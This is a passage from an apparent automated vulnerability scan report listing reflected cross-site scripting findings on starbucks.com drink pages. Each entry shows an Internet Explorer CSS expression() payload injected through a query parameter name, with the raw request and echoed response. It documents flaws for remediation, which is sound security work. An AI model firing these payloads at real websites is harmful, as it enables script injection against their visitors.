Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:57 GMT
Connection: close
Content-Length: 45546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme?89ffa"style="x:expression(alert(1))"445beb5d76e=1"/>
...[SNIP]...

2.155. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38463"style%3d"x%3aexpression(alert(1))"4a36fa03848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 38463"style="x:expression(alert(1))"4a36fa03848 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The reflection point is the content attribute of the og:url <meta> tag, which echoes the full request URL, including the URL-decoded query string, so the injected double quote closes the attribute and the rest of the payload is parsed as additional attributes on the tag. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run the script. Note that CSS expressions are an Internet Explorer feature (IE7 and earlier, and IE8 only in quirks or compatibility mode), so this exact payload will not fire in other browsers; the underlying defect, a double quote reaching a quoted attribute unencoded, is browser-independent, but whether a payload for current browsers can be built depends on which other characters (for example >) survive the same reflection, which this probe does not test.

Request

GET /menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee?38463"style%3d"x%3aexpression(alert(1))"4a36fa03848=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:07 GMT
Connection: close
Content-Length: 45029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee?38463"style="x:expression(alert(1))"4a36fa03848=1"/>
...[SNIP]...

2.156. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8fd2"style%3d"x%3aexpression(alert(1))"aae7138fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8fd2"style="x:expression(alert(1))"aae7138fd in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The reflection point is the content attribute of the og:url <meta> tag, which echoes the full request URL, including the URL-decoded query string, so the injected double quote closes the attribute and the rest of the payload is parsed as additional attributes on the tag. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run the script. Note that CSS expressions are an Internet Explorer feature (IE7 and earlier, and IE8 only in quirks or compatibility mode), so this exact payload will not fire in other browsers; the underlying defect, a double quote reaching a quoted attribute unencoded, is browser-independent, but whether a payload for current browsers can be built depends on which other characters (for example >) survive the same reflection, which this probe does not test.

Request

GET /menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage?f8fd2"style%3d"x%3aexpression(alert(1))"aae7138fd=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:38 GMT
Connection: close
Content-Length: 45195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage?f8fd2"style="x:expression(alert(1))"aae7138fd=1"/>
...[SNIP]...

2.157. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 273ef"style%3d"x%3aexpression(alert(1))"6997b4054c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 273ef"style="x:expression(alert(1))"6997b4054c9 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The reflection point is the content attribute of the og:url <meta> tag, which echoes the full request URL, including the URL-decoded query string, so the injected double quote closes the attribute and the rest of the payload is parsed as additional attributes on the tag. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run the script. Note that CSS expressions are an Internet Explorer feature (IE7 and earlier, and IE8 only in quirks or compatibility mode), so this exact payload will not fire in other browsers; the underlying defect, a double quote reaching a quoted attribute unencoded, is browser-independent, but whether a payload for current browsers can be built depends on which other characters (for example >) survive the same reflection, which this probe does not test.

Request

GET /menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme?273ef"style%3d"x%3aexpression(alert(1))"6997b4054c9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:33 GMT
Connection: close
Content-Length: 45219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme?273ef"style="x:expression(alert(1))"6997b4054c9=1"/>
...[SNIP]...

2.158. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a811"style%3d"x%3aexpression(alert(1))"b915f0e0432 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a811"style="x:expression(alert(1))"b915f0e0432 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The reflection point is the content attribute of the og:url <meta> tag, which echoes the full request URL, including the URL-decoded query string, so the injected double quote closes the attribute and the rest of the payload is parsed as additional attributes on the tag. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run the script. Note that CSS expressions are an Internet Explorer feature (IE7 and earlier, and IE8 only in quirks or compatibility mode), so this exact payload will not fire in other browsers; the underlying defect, a double quote reaching a quoted attribute unencoded, is browser-independent, but whether a payload for current browsers can be built depends on which other characters (for example >) survive the same reflection, which this probe does not test.

Request

GET /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee?2a811"style%3d"x%3aexpression(alert(1))"b915f0e0432=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:09 GMT
Connection: close
Content-Length: 45446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee?2a811"style="x:expression(alert(1))"b915f0e0432=1"/>
...[SNIP]...

2.159. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68dcf"style%3d"x%3aexpression(alert(1))"65b8aeb2cb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68dcf"style="x:expression(alert(1))"65b8aeb2cb6 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The reflection point is the content attribute of the og:url <meta> tag, which echoes the full request URL, including the URL-decoded query string, so the injected double quote closes the attribute and the rest of the payload is parsed as additional attributes on the tag. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run the script. Note that CSS expressions are an Internet Explorer feature (IE7 and earlier, and IE8 only in quirks or compatibility mode), so this exact payload will not fire in other browsers; the underlying defect, a double quote reaching a quoted attribute unencoded, is browser-independent, but whether a payload for current browsers can be built depends on which other characters (for example >) survive the same reflection, which this probe does not test.

Request

GET /menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee?68dcf"style%3d"x%3aexpression(alert(1))"65b8aeb2cb6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:12 GMT
Connection: close
Content-Length: 45045

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee?68dcf"style="x:expression(alert(1))"65b8aeb2cb6=1"/>
...[SNIP]...

2.160. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed35a"style%3d"x%3aexpression(alert(1))"d1c3ede59d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed35a"style="x:expression(alert(1))"d1c3ede59d9 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The reflection point is the content attribute of the og:url <meta> tag, which echoes the full request URL, including the URL-decoded query string, so the injected double quote closes the attribute and the rest of the payload is parsed as additional attributes on the tag. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run the script. Note that CSS expressions are an Internet Explorer feature (IE7 and earlier, and IE8 only in quirks or compatibility mode), so this exact payload will not fire in other browsers; the underlying defect, a double quote reaching a quoted attribute unencoded, is browser-independent, but whether a payload for current browsers can be built depends on which other characters (for example >) survive the same reflection, which this probe does not test.

Request

GET /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee?ed35a"style%3d"x%3aexpression(alert(1))"d1c3ede59d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:17 GMT
Connection: close
Content-Length: 45258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee?ed35a"style="x:expression(alert(1))"d1c3ede59d9=1"/>
...[SNIP]...

2.161. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec96"style%3d"x%3aexpression(alert(1))"349c64eee81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cec96"style="x:expression(alert(1))"349c64eee81 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The reflection point is the content attribute of the og:url <meta> tag, which echoes the full request URL, including the URL-decoded query string, so the injected double quote closes the attribute and the rest of the payload is parsed as additional attributes on the tag. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run the script. Note that CSS expressions are an Internet Explorer feature (IE7 and earlier, and IE8 only in quirks or compatibility mode), so this exact payload will not fire in other browsers; the underlying defect, a double quote reaching a quoted attribute unencoded, is browser-independent, but whether a payload for current browsers can be built depends on which other characters (for example >) survive the same reflection, which this probe does not test.

Request

GET /menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee?cec96"style%3d"x%3aexpression(alert(1))"349c64eee81=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:56 GMT
Connection: close
Content-Length: 45212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee?cec96"style="x:expression(alert(1))"349c64eee81=1"/>
...[SNIP]...

2.162. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71256"style%3d"x%3aexpression(alert(1))"331875fd0d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71256"style="x:expression(alert(1))"331875fd0d7 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The reflection point is the content attribute of the og:url <meta> tag, which echoes the full request URL, including the URL-decoded query string, so the injected double quote closes the attribute and the rest of the payload is parsed as additional attributes on the tag. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run the script. Note that CSS expressions are an Internet Explorer feature (IE7 and earlier, and IE8 only in quirks or compatibility mode), so this exact payload will not fire in other browsers; the underlying defect, a double quote reaching a quoted attribute unencoded, is browser-independent, but whether a payload for current browsers can be built depends on which other characters (for example >) survive the same reflection, which this probe does not test.

Request

GET /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage?71256"style%3d"x%3aexpression(alert(1))"331875fd0d7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:42 GMT
Connection: close
Content-Length: 43744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage?71256"style="x:expression(alert(1))"331875fd0d7=1"/>
...[SNIP]...

2.163. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cee5"style%3d"x%3aexpression(alert(1))"c50edecec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2cee5"style="x:expression(alert(1))"c50edecec in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The reflection point is the content attribute of the og:url <meta> tag, which echoes the full request URL, including the URL-decoded query string, so the injected double quote closes the attribute and the rest of the payload is parsed as additional attributes on the tag. The PoC uses a dynamically evaluated CSS expression() in an injected style attribute to run the script. Note that CSS expressions are an Internet Explorer feature (IE7 and earlier, and IE8 only in quirks or compatibility mode), so this exact payload will not fire in other browsers; the underlying defect, a double quote reaching a quoted attribute unencoded, is browser-independent, but whether a payload for current browsers can be built depends on which other characters (for example >) survive the same reflection, which this probe does not test.

Request

GET /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage?2cee5"style%3d"x%3aexpression(alert(1))"c50edecec=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:01 GMT
Connection: close
Content-Length: 42963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage?2cee5"style="x:expression(alert(1))"c50edecec=1"/>
...[SNIP]...

2.164. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ebb"style%3d"x%3aexpression(alert(1))"f3fa25f47de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13ebb"style="x:expression(alert(1))"f3fa25f47de in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The PoC terminates the double-quoted attribute value and introduces a style attribute whose value is a dynamically evaluated CSS expression() that runs JavaScript. The expression() technique is specific to Internet Explorer and does not fire in other browsers; the underlying defect, unencoded user input inside a quoted attribute value, is browser-independent.

Request

GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage?13ebb"style%3d"x%3aexpression(alert(1))"f3fa25f47de=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:39 GMT
Connection: close
Content-Length: 45020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage?13ebb"style="x:expression(alert(1))"f3fa25f47de=1"/>
...[SNIP]...

2.165. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2a77"style%3d"x%3aexpression(alert(1))"08cacbe5b0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2a77"style="x:expression(alert(1))"08cacbe5b0f in the application's response.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The PoC terminates the double-quoted attribute value and introduces a style attribute whose value is a dynamically evaluated CSS expression() that runs JavaScript. The expression() technique is specific to Internet Explorer and does not fire in other browsers; the underlying defect, unencoded user input inside a quoted attribute value, is browser-independent.

Request

GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage?b2a77"style%3d"x%3aexpression(alert(1))"08cacbe5b0f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:40 GMT
Connection: close
Content-Length: 45296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage?b2a77"style="x:expression(alert(1))"08cacbe5b0f=1"/>
...[SNIP]...

2.166. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e6e"style%3d"x%3aexpression(alert(1))"257fad08362 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98e6e"style="x:expression(alert(1))"257fad08362 in the application's response.

